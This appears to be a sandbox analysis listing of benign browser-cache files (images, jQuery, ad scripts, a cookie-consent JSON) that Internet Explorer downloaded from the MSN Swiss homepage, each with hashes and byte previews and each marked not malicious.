Preview:	......JFIF.....H.H.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......(....Zau^.).t..4...........G.M7/..../.H.V`.Pe.(.5...#L/....].T_Sb}N4..oo.Vt.s.........4.C..`....G.....g#.$Qp.a..z..4.j....?...}.J.....]7..k.@.$.F0^......F......j....^.3..jh.x....n....?.'5RC]19.+..j.3M-...b..X.m.w.4..=\..E_.EVy.~...*=.+...m.=..>xE.MDY..1.L.0..Y..(ElO.)......j..&^i.Z..TfR{...a.I.Z..R.i...h...R.f..4.Er.9...Q.........52..b...Z..6#..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB1b9ptQ[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	27211
Entropy (8bit):	7.966534347445324
Encrypted:	false
SSDEEP:	768:eJSgytcjAbSFeSS9t7rvlWmisVpZNrqPuXVJux:eJSgytcMWl09rdWmisXZNOH
MD5:	DAB0C3A656CF5C0A4F1A7645F10B7CCA
SHA1:	0B175544E0998733A60DE24CA03A5ED6D3351413
SHA-256:	E866CE11D7CD301B78C2671A06CF2CBE948FB455599DA79475429F96C82781F0
SHA-512:	900A09ED2AC9932B3266D3925A16E24CB22D6FEA5433487D664C7F866979C709744DFE92F2801E7A9396D6812A0BA8C0CF3CFEC85266159ACC10194A12014313
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b9ptQ.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......l...?..a......M.P.*...y...9.!..........sS.L..s.....=v=5..^dz..Op..==."....S.S....'.vB.8..c...Z..J1..\T...O.0.:..@..LU.l..i...E.....M..).c...U..w...=..^.oh...'..>.S........e..i3@.4..,I4...$.....Y.O..F^...#..OJW&.]..o/.BDY.!..r.J.,.-...:\|K.820,.S..Z..Is....C..s...w...e.1..Q.....Mf........pZ.e~.n#.g..V....O....\...'.#.R...2....S.=v.l.A.;A;....j..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB1b9qAf[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 206x250, frames 3
Category:	downloaded
Size (bytes):	7925
Entropy (8bit):	7.9193332173198066
Encrypted:	false
SSDEEP:	192:BCAX2d+VRq+30yUYEFwyan/gAF7otx8DGPY2BpBiooy:kARx0yjEeysg+7GPYaCY
MD5:	35F14A780D7000AE42F86C92F569EB74
SHA1:	60116CC245620808E4452B4F38D5BECBAEA46A3F
SHA-256:	6C3F57B1DDFF1644C20BA339C669A223BF4F8FB8C74DC106E4305F66D129EA68
SHA-512:	F2BA0BAF074DEFF97F6084E5A5723BDAFC96939590B82D57F8AF3A9EC07DA8F06A7834ACCB370D017AD6FF8D7010D5AD22AE0700C8552EEC5F12C4E9DEDA6E7C
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b9qAf.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg&x=706&y=262
Preview:	......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..].r.qO..!...j[....Y5T.....})1..f.%sL......R..Y..}.qg,...q.....c.u.4;...'....~..I.Z.`H...=.....2.+..-n..J.k.....*..U..2.$g.0F+..{.#..\|`~&.-4.....V..P......L.4...o.......U.f..-...p....nr:u.)b..gFB@..D.k.&..I.F.'.Pg.7....I.N..........k...c'...;~..5......".....S`.1q...q.S....>...1...cE..;.,+......o .asU..1.....Oz...g...$.$.]i..S.Bj3(_..Rx.Ow.'...}........`~y.#M

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB6Ma4a[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	396
Entropy (8bit):	6.789155851158018
Encrypted:	false
SSDEEP:	6:6v/lhPkR/CnFPFaUSs1venewS8cJY1pXVhk5Ywr+hrYYg5Y2dFSkjhT5uMEjrTp:6v/78/kFPFnXleeH8YY9yEMpyk3Tc
MD5:	6D4A6F49A9B752ED252A81E201B7DB38
SHA1:	765E36638581717C254DB61456060B5A3103863A
SHA-256:	500064FB54947219AB4D34F963068E2DE52647CF74A03943A63DC5A51847F588
SHA-512:	34E44D7ECB99193427AA5F93EFC27ABC1D552CA58A391506ACA0B166D3831908675F764F25A698A064A8DA01E1F7F58FE7A6A40C924B99706EC9135540968F1A
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB6Ma4a.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J....!IDAT8Oc\|. ..?...\|.UA....GP.`\|. ......E...b.....&.>..x.h....c.....g.N...?5.1.8p.....>1..p...0.EA.A...0...cC/...0Ai8...._....p.....)....2...AE....Y?.......8p..d......$1l.%.8.<.6..Lf..a.........%.....-.q...8...4...."...`5..G!.\|..L....p8 ...p.......P....,..l.(..C]@L.#....P...)......8......[.7MZ.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BBOLLMj[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	507
Entropy (8bit):	7.140014669230146
Encrypted:	false
SSDEEP:	12:6v/78/soC6yG9YjUiWGS3Sw38Cztj2ChFblexnDizTGN:RCMnX3fxzhhqxn8TGN
MD5:	25D424F126A464CA028C0C9BA692ADA9
SHA1:	E54F845D1099C8D7B7BA0C5E9B57DFA7163CE95C
SHA-256:	E0DF9CDAFF2557C7B555FFAED40B7E553FF6C50DD58FE79C27B3AA69CC56258D
SHA-512:	7E72F13B354AA5EE99EC50057DB2BFBC35A78D5617A36ED90864D1DA6AC1B692301115EF8F44255AB3894142D6C0F634A2CFD44EBCD00B039DC628F751579DC3
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBOLLMj.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....IDAT8Oc.v.............g8......'.......X].............l.....z..]\.\|d...i5U`.,,,......~.f.+-ax..5T..`....S.M{......d..w?...1..?..Vo...G....>z.L...2..10222.::1...1....,..0.........``b.HgFE3<;z..,5..G.,P...........t..Y._.}...TT..}.l..0..j......%..^.{.f.9;c....aAA0...w0]....ag.fc...(HK...>0....!=".AMQ.,..`......y...8.a....k.D..`..J8..!`....\|.R...@S.,..0...&..2...0.8t.....yq..B...Wo..@...F..........ks.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BBPfCZL[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 50 x 50
Category:	downloaded
Size (bytes):	2313
Entropy (8bit):	7.594679301225926
Encrypted:	false
SSDEEP:	48:5Zvh21Zt5SkY33fS+PuSsgSrrVi7X3ZgMjkCqBn9VKg3dPnRd:vkrrS333q+PagKk7X3ZgaI9kMpRd
MD5:	59DAB7927838DE6A39856EED1495701B
SHA1:	A80734C857BFF8FF159C1879A041C6EA2329A1FA
SHA-256:	544BA9B5585B12B62B01C095633EFC953A7732A29CB1E941FDE5AD62AD462D57
SHA-512:	7D3FB1A5CC782E3C5047A6C5F14BF26DD39B8974962550193464B84A9B83B4C42FB38B19BD0CEF8247B78E3674F0C26F499DAFCF9AF780710221259D2625DB86
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	GIF89a2.2.....7..;..?..C..I..H..<..9.....8..F..7..E..@..C..@..6..9..8..J..z.G..>..?..A..6..>..8..:..A..=..B..4..B..D..=..K..=..@..<..:..3~.B..D.....,\|.4..2..6..:..J..;..G....Fl..1}.4..R.....Y..E..>..9..5..X..A..2..P..J../\|.9.....T.+Z.....+..<.Fq.Gn..V..;..7.Lr..W..C..<.Fp.]......A.....0{.L..E..H..@.....3..3..O..M..K....#[.3i..D..>........I....<n..;..Z..1..G..8..E....Hu..1..>..T..a.Fs..C..8..0}....;..6..t.Ft..5.Bi..:.x...E.....'z^~.......[....8`..........;..@..B.....7.....<.................F.....6...........>..?.n......g.......s...)a.Cm....'a.0Z..7....3f..<.:e.....@.q.....Ds..B....!P.n...J............Li..=......F.....B.....:r....w..\|..........`..[}.g...J.Ms..K.Ft.....'..>..........Ry.Nv.n..]..Bl........S..;....Dj.....=.....O.y.......6..J.......)V..g..5.......!..NETSCAPE2.0.....!...d...,....2.2........3.`..9.(\|.d.C .wH.(."D...(D.....d.Y......<.(PP.F...dL.@.&.28..$1S....TP......>...L..!T.X!.(..@a..IsgM..\|..Jc(Q.+.......2.:.)y2.J......W,..eW2.!....!....C.....d...zeh....P.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BBX2afX[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	688
Entropy (8bit):	7.578207563914851
Encrypted:	false
SSDEEP:	12:6v/74//aaICzkSOms9aEx1Jt+9YKLg+b3OI21P7qO1uCqbyldNEiA67:BPObXRc6AjOI21Pf1dNCg
MD5:	09A4FCF1442AD182D5E707FEBC1A665F
SHA1:	34491D02888B36F88365639EE0458EDB0A4EC3AC
SHA-256:	BE265513903C278F9C6E1EB9E4158FA7837A2ABAC6A75ECBE9D16F918C12B536
SHA-512:	2A8FA8652CB92BBA624478662BC7462D4EA8500FA36FE5E77CBD50AC6BD0F635AA68988C0E646FEDC39428C19715DCD254E241EB18A184679C3A152030FD9FF8
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................U....sRGB.........gAMA......a.....pHYs..........o.d...EIDATHK.Mh.A......4.....b.Zoz....z.".....A../.X.../........"(.A.(.qPAK/......I.Yw3...M...z./...7..}o...~u'...K_...YM...5w1b....y.V.\|.-e.i..D...[V.J...C......R.QH.....:....U.....].$]LE3.}........r..#.]...MS.....S..#..t1...Y...g........ 8."m......Q..>,.?S..{.(7.....;..I.w...?MZ..>.......7z.=.@.q@.;.U..~....:.[.Z+3UL#.........G+3.=.V."D7...r/K.._..LxY.....E..$..{. sj.D...&.......{.rYU..~G....F3..E...{. ......S....A.Z.f<=.....'.1ve.2}[.....C....h&....r.O..c....u... .N_.S.Y.Q~.?..0.M.L..P.#...b..&..5.Z....r.Q.zM'<...+.X3..Tgf._...+SS...u........./.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BBnYSFZ[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	560
Entropy (8bit):	7.425950711006173
Encrypted:	false
SSDEEP:	12:6v/78/+m8H/Ji+Vncvt7xBkVqZ5F8FFl4hzuegQZ+26gkalFUx:6H/xVA7BkQZL8OhzueD+ikalY
MD5:	CA188779452FF7790C6D312829EEE284
SHA1:	076DF7DE6D49A434BBCB5D88B88468255A739F53
SHA-256:	D30AB7B54AA074DE5E221FE11531FD7528D9EEEAA870A3551F36CB652821292F
SHA-512:	2CA81A25769BFB642A0BFAB8F473C034BFD122C4A44E5452D79EC9DC9E483869256500E266CE26302810690374BF36E838511C38F5A36A2BF71ACF5445AA2436
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....IDAT8O.S.KbQ..zf.j...?@...........J.......z..EA3P....AH...Y..3......\|6.6}......{..n. ...b..........".h4b.z.&.p8`...:..Lc....u:......D...i$.)..pL.^..dB.T....#.f3...8.N.b1.B!.\...n..a...a.Z........J%.x<....\|..b.h4.`0.EQP.. v.q....f.9.H`8..\...j.N&...X,2...<.B.v[.(.NS6..\|>..n4...2.57........f.Q&.a-..v..z..{P.V......>k.J...ri..,.W.+.......5:.W.t...i.....g....\.t..8.w...:......0....%~...F.F.o".'rx...b..vp....b.l.Pa.W.r..aK..9&...>.5...`..'W......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\de-ch[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	434188
Entropy (8bit):	5.437904396271205
Encrypted:	false
SSDEEP:	3072:B/2JUBxx+vSl1UKexXsf8JxKlBEXnNUPX+RHnwgMy32e/sULG:B/2WOvSl4e0nNcmR532e/st
MD5:	91AD1ABA17F177B13C8439C58AABAEE7
SHA1:	5F1F8A4C6793AE989941EDA1803242B9C02AFAD0
SHA-256:	8EC049DBECF91F670DF7FB0D099784215DDC919FAF4B76C9F11D85A541A5F867
SHA-512:	5698E8DFF161C387FD5FD40A44E8D9DC5C51D3BE7BFEA7DDAF5CC74ABD87D36D5B85533D57C6A7BC975A87EEDE8392475A436FE4B09A641FC3C5B72013A00304
Malicious:	false
Preview:	<!DOCTYPE html><html prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" lang="de-CH" class="hiperf" dir="ltr" >.. <head data-info="v:20201106_28703143;a:01993e53-dc8d-4e98-80fc-bea0201e39f7;cn:23;az:{did:951b20c4cd6d42d29795c846b4755d88, rid: 23, sn: neurope-prod-hp, dt: 2020-11-19T07:07:45.8691627Z, bt: 2020-11-07T01:20:29.2539316Z};ddpi:1;dpio:;dpi:1;dg:tmx.pc.ms.ie10plus;th:start;PageName:startPage;m:de-ch;cb:;l:de-ch;mu:de-ch;ud:{cid:,vk:homepage,n:,l:de-ch,ck:};xd:BBqgbZW;ovc:f;al:;fxd:f;xdpub:2020-11-17 22:04:31Z;xdmap:2020-11-19 08:11:35Z;axd:;f:msnallexpusers,muidflt28cf,muidflt52cf,muidflt56cf,pnehp1cf,pnehp3cf,audexhp1cf,audexhz1cf,audexhz3cf,artgly2cf,gallery5cf,onetrustpoplive,1s-bing-news,vebudumu04302020,bbh20200521msncf,msnsports5cf;userOptOut:false;userOptOutOptions:" data-js="{"dpi":1.0,"ddpi":1.0,"dpio":null,"forcedpi":null,"dms":6000,"ps":1000,"bds":7,"dg":"tmx.pc.ms.ie1

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\down[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 15 x 15, 8-bit colormap, non-interlaced
Category:	downloaded
Size (bytes):	748
Entropy (8bit):	7.249606135668305
Encrypted:	false
SSDEEP:	12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
MD5:	C4F558C4C8B56858F15C09037CD6625A
SHA1:	EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
SHA-256:	39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
SHA-512:	D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
Malicious:	false
IE Cache URL:	res://ieframe.dll/down.png
Preview:	.PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?\|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\http___cdn.taboola.com_libtrc_static_thumbnails_c8bf3dc80d22e3af11a08327177cc669[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	18080
Entropy (8bit):	7.972859220907851
Encrypted:	false
SSDEEP:	384:rXguIuvADyKYSYpSBakCdGZJAcEphr3IxQKKWS634kdDIZqBKn1lBW:rXH0yJS56phDIPZKkdEIKn17W
MD5:	C9ABE23FC9046D8311E221E173EC399F
SHA1:	6C7E01D5E7A2450344D44D8AE8D1EFCFC9233DF4
SHA-256:	C893F72E807E7105423E979EE69E2050D2B482DCBC5185F43905AF6B4A47950C
SHA-512:	02161148FCDF0E90DBB5327FC185A03F7BA9B650B3B1705599EB6295EEA88708670DC2099BA744C0C7D7CDC8D1D1625BCF7E13206738755A21E1A12D225381E5
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fc8bf3dc80d22e3af11a08327177cc669.jpg
Preview:	......JFIF.....................................................................&""&0-0>>T............................."......".$...$.6&&6>424>LDDL_Z_\|\|.......7...............6.......................................................................bL.2....0...&0.(L...)$..0..$..0.L0.. .A.{..I&FVD....A..a.....%.E.I.a..[pA.a..A..l.@ .CK68....9r.e...f.q.0I..... ..."...]l..A.#.h."I&0..A........].\081..hpd..a.....R.t.)j.U.}x..6....I.2...Q..j.@dm..j...>.#a..9.(#.0....j.R....Uo.....[...\~1..l0d..F.a.....U$...^.+.c..0..x..>......I0..\4.8...](U.)J..$[..b.;.d`a$.........(..W23...j2W....I....#B....m.c.....3e..]..s.rE..y...o.<....}..#....U.......d..~.N.....sM.,..kk..7U.k.....n..sF,.)A.g........J..{?Kx>?.=..9..=.6..".X......5._Nq.\|.o.........>M).._..:~...V.....=.I...._q.e.{.......5..l3...o1....xG.}.....F7.w.X..+.....<~....-...zln>.\|....../....n...z.....:;.:....X.-...<...=........O..G;.y~}..s....{...9./.....=...].n.=....E...[Z.}[..^CG~..-.(sl>iC.v....;.n<..tp..v1.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\jquery-2.1.1.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	84249
Entropy (8bit):	5.369991369254365
Encrypted:	false
SSDEEP:	1536:DPEkjP+iADIOr/NEe876nmBu3HvF38NdTuJO1z6/A4TqAub0R4ULvguEhjzXpa9r:oNM2Jiz6oAFKP5a98HrY
MD5:	9A094379D98C6458D480AD5A51C4AA27
SHA1:	3FE9D8ACAAEC99FC8A3F0E90ED66D5057DA2DE4E
SHA-256:	B2CE8462D173FC92B60F98701F45443710E423AF1B11525A762008FF2C1A0204
SHA-512:	4BBB1CCB1C9712ACE14220D79A16CAD01B56A4175A0DD837A90CA4D6EC262EBF0FC20E6FA1E19DB593F3D593DDD90CFDFFE492EF17A356A1756F27F90376B650
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquery-2.1.1.min.js
Preview:	/! jQuery v2.1.1 \| (c) 2005, 2014 jQuery Foundation, Inc. \| jquery.org/license /..!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.1",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,funct

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\medianet[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	downloaded
Size (bytes):	384121
Entropy (8bit):	5.483875510991465
Encrypted:	false
SSDEEP:	6144:lh7VC2N85vb2H0m943GNVoTgz5aCuJbkqU21fij:la5vye3GNVoTg8xpkqU21fij
MD5:	F249F1B79B182B6973AB3DF3F5E09F76
SHA1:	3AE2CCBC9844CC73364FAE74DF4A3EAA2FF6205E
SHA-256:	6B2638BC8372ED63F74BC61E0036423196B71A30FFBC4E74FEDD97068A0B9BD6
SHA-512:	EC9B8099A1832EE22744AFBAD19CA68E97F8D4D2CFC5C150995C045FB14F72F410B17D4F316B2988D0C8A7DCA86D47758E77BA633081B2A805E75AD7D0FA8B70
Malicious:	false
IE Cache URL:	https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Preview:	<html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs\|\|{},window.mnjs.ERP=window.mnjs.ERP\|\|function(){"use strict";function e(e){"object"==typeof e&&(p=e)}function n(e){g=e}function t(e){m=e}function o(e){d=e}function r(e){"undefined"==typeof e.logLevel&&(e={logLevel:3,errorVal:e}),e.logLevel>=3&&w[e.logLevel-1].push(e)}function i(){var e,n=0;for(e=0;e<v;e++)n+=w[e].length;if(0!==n){var t,o,r,i,s=new Image,a=p.lurl?p.lurl:"https://lg3-a.akamaihd.net/nerrping.php",f="",c=0;for(e=v-1;e>=0;e--){for(n=w[e].length,t=0;t<n;){if(i=1===e?w[e][t]:{logLevel:w[e][t].logLevel,errorVal:{name:w[e][t].errorVal.name,type:g,svr:m,servname:d,message:w[e][t].errorVal.message,line:w[e][t].errorVal.lineNumber,description:w[e][t].errorVal.description,stack:w[e][t].errorVal.stack}},r=l(i),!(r.length+f.length<=1200)&&f.length){c=1;break}0!==f.length&&(f+=","),f+=r,w[e].shift(),n--

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\medianet[2].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	downloaded
Size (bytes):	384121
Entropy (8bit):	5.483807536961282
Encrypted:	false
SSDEEP:	6144:lh7VC2N85vb2H0m943GNVoTgz5aCuJbWqU21fij:la5vye3GNVoTg8xpWqU21fij
MD5:	2548606548D9DFCBDDD886377540A79A
SHA1:	97F11109163DA6F44C096182D4A76963CA9C9C3C
SHA-256:	73C3ED181E9A9468D5C31A1FBB3C4497C40A2DA605310181694A8693384143ED
SHA-512:	CB0852D25ECF8B3D67C87DE4778D9F901047C77634742A60331A2585816B9CE2C7D8DF048B1E781F31D5DD76A9AA8660E24B9FBBD00915C923D97624D614B97C
Malicious:	false
IE Cache URL:	https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Preview:	<html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs\|\|{},window.mnjs.ERP=window.mnjs.ERP\|\|function(){"use strict";function e(e){"object"==typeof e&&(p=e)}function n(e){g=e}function t(e){m=e}function o(e){d=e}function r(e){"undefined"==typeof e.logLevel&&(e={logLevel:3,errorVal:e}),e.logLevel>=3&&w[e.logLevel-1].push(e)}function i(){var e,n=0;for(e=0;e<v;e++)n+=w[e].length;if(0!==n){var t,o,r,i,s=new Image,a=p.lurl?p.lurl:"https://lg3-a.akamaihd.net/nerrping.php",f="",c=0;for(e=v-1;e>=0;e--){for(n=w[e].length,t=0;t<n;){if(i=1===e?w[e][t]:{logLevel:w[e][t].logLevel,errorVal:{name:w[e][t].errorVal.name,type:g,svr:m,servname:d,message:w[e][t].errorVal.message,line:w[e][t].errorVal.lineNumber,description:w[e][t].errorVal.description,stack:w[e][t].errorVal.stack}},r=l(i),!(r.length+f.length<=1200)&&f.length){c=1;break}0!==f.length&&(f+=","),f+=r,w[e].shift(),n--

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\otPcCenter[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	46394
Entropy (8bit):	5.58113620851811
Encrypted:	false
SSDEEP:	384:oj+X+jzgBCL2RAAaRKXWSU8zVrX0eQna41wFpWge0bRApQZInjatWLGuD3eWrwAs:4zgEFAJXWeNeIpW4lzZInuWjlHoQthI
MD5:	145CAF593D1A355E3ECD5450B51B1527
SHA1:	18F98698FC79BA278C4853D0DF2AEE80F61E15A2
SHA-256:	0914915E9870A4ED422DB68057A450DF6923A0FA824B1BE11ACA75C99C2DA9C2
SHA-512:	D02D8D4F9C894ADAB8A0B476D223653F69273B6A8B0476980CD567B7D7C217495401326B14FCBE632DA67C0CB897C158AFCB7125179728A6B679B5F81CADEB59
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/assets/v2/otPcCenter.json
Preview:	.. {.. "name": "otPcCenter",.. "html": "PGRpdiBpZD0ib25ldHJ1c3QtcGMtc2RrIiBjbGFzcz0ib3RQY0NlbnRlciBvdC1oaWRlIG90LWZhZGUtaW4iIGFyaWEtbW9kYWw9InRydWUiIHJvbGU9ImRpYWxvZyIgYXJpYS1sYWJlbGxlZGJ5PSJvdC1wYy10aXRsZSI+PCEtLSBDbG9zZSBCdXR0b24gLS0+PGRpdiBjbGFzcz0ib3QtcGMtaGVhZGVyIj48IS0tIExvZ28gVGFnIC0tPjxkaXYgY2xhc3M9Im90LXBjLWxvZ28iIHJvbGU9ImltZyIgYXJpYS1sYWJlbD0iQ29tcGFueSBMb2dvIj48L2Rpdj48YnV0dG9uIGlkPSJjbG9zZS1wYy1idG4taGFuZGxlciIgY2xhc3M9Im90LWNsb3NlLWljb24iIGFyaWEtbGFiZWw9IkNsb3NlIj48L2J1dHRvbj48L2Rpdj48IS0tIENsb3NlIEJ1dHRvbiAtLT48ZGl2IGlkPSJvdC1wYy1jb250ZW50IiBjbGFzcz0ib3QtcGMtc2Nyb2xsYmFyIj48aDMgaWQ9Im90LXBjLXRpdGxlIj5Zb3VyIFByaXZhY3k8L2gzPjxkaXYgaWQ9Im90LXBjLWRlc2MiPjwvZGl2PjxidXR0b24gaWQ9ImFjY2VwdC1yZWNvbW1lbmRlZC1idG4taGFuZGxlciI+QWxsb3cgYWxsPC9idXR0b24+PHNlY3Rpb24gY2xhc3M9Im90LXNkay1yb3cgb3QtY2F0LWdycCI+PGgzIGlkPSJvdC1jYXRlZ29yeS10aXRsZSI+TWFuYWdlIENvb2tpZSBQ